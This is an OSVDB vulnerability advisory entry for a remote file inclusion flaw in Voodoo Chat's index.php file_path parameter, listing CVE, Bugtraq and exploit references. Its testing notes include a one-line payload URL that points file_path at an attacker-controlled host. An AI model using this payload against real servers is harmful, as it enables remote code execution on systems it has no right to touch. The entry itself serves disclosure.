Voodoo Chat index.php file_path Variable Remote File Inclusion

2006-08-01T14:24:16
ID OSVDB:30197
Type osvdb
Reporter OSVDB
Modified 2006-08-01T14:24:16

Description

Manual Testing Notes

http://[target]/[Script Path]/index.php?file_path=http://[attacker]?

References:

ISS X-Force ID: 28197 Generic Exploit URL: http://www.milw0rm.com/exploits/2102 FrSIRT Advisory: ADV-2006-3091 CVE-2006-3991 Bugtraq ID: 19277